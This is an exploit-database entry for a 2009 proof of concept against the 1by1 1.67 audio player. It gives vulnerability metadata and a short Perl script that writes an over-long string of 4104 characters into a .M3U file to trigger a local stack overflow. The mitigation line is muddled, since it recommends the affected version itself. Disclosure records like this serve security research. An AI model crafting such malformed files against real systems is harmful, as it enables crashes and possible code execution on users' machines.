header-logo
Suggest Exploit
vendor:
1by1
by:
milw0rm.com
7,8
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: 1by1
Affected Version From: 1.67
Affected Version To: 1.67
Patch Exists: YES
Related CWE: N/A
CPE: a:1by1:1by1:1.67
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

1by1 1.67 (.M3U File) Local Stack Overflow POC

A stack overflow vulnerability exists in 1by1 1.67 when a specially crafted .M3U file is opened. This can be exploited to cause a stack-based buffer overflow via an overly long string. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of 1by1 1.67 or later.
Source

Exploit-DB raw data:

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
# #  1by1 1.67 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

# milw0rm.com [2009-04-20]

Navigation

Suggest Exploit

Services By CQR